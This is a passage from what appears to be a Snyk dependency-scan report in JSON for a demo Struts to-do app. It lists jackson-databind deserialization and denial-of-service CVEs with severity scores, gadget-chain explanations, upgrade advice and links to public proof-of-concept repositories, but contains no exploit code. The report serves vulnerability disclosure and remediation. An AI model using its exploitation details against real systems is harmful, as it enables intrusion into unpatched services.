\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36188" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:39:28.531700Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:38:32Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:03.468032Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[, 2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Poc" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.854860Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.686589Z" - } - ], - "cvssSources": [ - { - "type": 
"primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.757298Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.854860Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.686589Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36181" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:41:09.172252Z", - "functions_new": [ - { - "version": [ - "[, 2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:38:31Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.686589Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Yangkun (ICSL)" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2854", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", - "title": "GitHub Release" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:37.142422Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:15.847219Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:17.193594Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:04.169362Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:37.142422Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:15.847219Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:17.193594Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", - "epssDetails": { - "percentile": "0.74700", - "probability": "0.00431", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-20190" - ], - "CWE": [ - "CWE-502", - "CWE-918" - ], - "GHSA": [ - "GHSA-5949-rw7g-wx7w" - ], - "RHSA": [ - "RHSA-1610966837463990" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-18T12:50:16.466618Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-16T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-18T17:23:46Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:17.193594Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9)", - "[2.8.0,2.8.11.4)", - "[2.7.0,2.7.9.6)", - "[,2.6.7.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.9", - "2.8.11.4", - "2.7.9.6", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.9)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2326", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", - "title": "Github Release Tag" - }, - { - "url": "https://github.com/Al1ex/CVE-2019-12086", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": 
"2024-03-11T09:47:31.553438Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:49.785293Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:55.897269Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:31.553438Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.785293Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", - "epssDetails": { - "percentile": "0.74218", - "probability": "0.00415", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12086" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-5ww9-j83m-q7qx" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-05-19T10:19:10.287403Z", - "functions_new": [ - { - "version": [ - "[,2.9.9)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-05-17T18:12:58Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": 
"maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-05-17T18:12:58Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.785293Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.12.6.1", - "2.13.2.1" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable when using nested objects." 
- }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", - "className": "UntypedObjectDeserializer$Vanilla", - "functionName": "mapArray" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", - "className": "UntypedObjectDeserializer", - "functionName": "createContextual" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", - "className": "UntypedObjectDeserializer", - "functionName": "mapObject" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2816", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/pull/3416", - "title": "GitHub PR" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:21.238636Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:51.113569Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:50.929583Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:31.056720Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:21.238636Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.113569Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:50.929583Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", - "epssDetails": { - "percentile": "0.60309", - "probability": "0.00218", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36518" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-03-11T13:26:43.073121Z", - "functions_new": [ - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": 
